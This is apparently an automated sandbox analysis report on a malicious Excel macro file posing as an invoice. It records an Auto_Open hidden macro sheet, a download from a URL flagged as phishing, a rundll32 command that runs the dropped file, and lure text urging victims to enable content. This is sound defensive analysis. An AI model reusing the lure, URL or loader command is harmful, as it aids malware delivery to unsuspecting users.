Play interactive tour

Edit tour

Analysis Report invoice_661434949_67552437.xlsm

Overview

General Information

Sample Name:	invoice_661434949_67552437.xlsm
Analysis ID:	385000
MD5:	64f33ccbc7976306417b2b2528daa5fe
SHA1:	d71433580e83ab455556a88c483d1887e9641be6
SHA256:	03a7d4fc0e9d75fb98ca2aba43729acb93803959b1421d8878548643c12e3d73
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Allocates a big amount of memory (probably used for heap spraying)

Excel documents contains an embedded macro which executes code when the document is opened

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Classification

Startup

System is w10x64

EXCEL.EXE (PID: 2576 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)

rundll32.exe (PID: 5380 cmdline: rundll32 ..\GVer.iks,StartW MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://indianoci.co.uk/ufriends/support.php

Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Show sources

Source: http://indianoci.co.uk/ufriends/support.php

Virustotal: Detection: 11%

Perma Link

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe

Source: excel.exe

Memory has grown: Private usage: 1MB later: 77MB

Source: global traffic

DNS query: name: indianoci.co.uk

Source: global traffic

TCP traffic: 192.168.2.3:49713 -> 172.67.189.4:80

Source: global traffic

TCP traffic: 192.168.2.3:49713 -> 172.67.189.4:80

Source: global traffic

HTTP traffic detected: GET /ufriends/support.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: indianoci.co.ukConnection: Keep-Alive

Source: global traffic

Source: unknown

DNS traffic detected: queries for: indianoci.co.uk

Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.office.net
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://augloop.office.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://cdn.entity.
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://cortana.ai
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://cr.office.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://directory.services.
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://graph.windows.net
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://login.windows.local
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://management.azure.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://management.azure.com/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://tasks.office.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: support[1].htm.0.dr	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 651B4591-EA57-4383-A1E3-6BA7A6B10F4A.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable editing button from the yellow bar above 12 " Once you have enabled editing. please click En
Source: Screenshot number: 4	Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: invoice_661434949_67552437.xlsm

Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: invoice_661434949_67552437.xlsm

Initial sample: Sheet size: 33810

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr defaultThemeVersion="166925"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{05BDDAB3-C450-4DCC-9410-E7A97B5B20DA}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Doc" sheetId="1" r:id="rId1"/><sheet name="Doc1" sheetId="2" r:id="rId2"/><sheet name="Doc2" sheetId="3" state="hidden" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc1'!$CL$5</definedName></definedNames><calcPr calcId="0"/></workbook>

Source: classification engine

Classification label: mal80.expl.evad.winXLSM@3/10@1/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{09B22A25-E75E-48C7-8593-ABC13CDBB4E0} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\GVer.iks,StartW

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\GVer.iks,StartW
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\GVer.iks,StartW

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: invoice_661434949_67552437.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: invoice_661434949_67552437.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
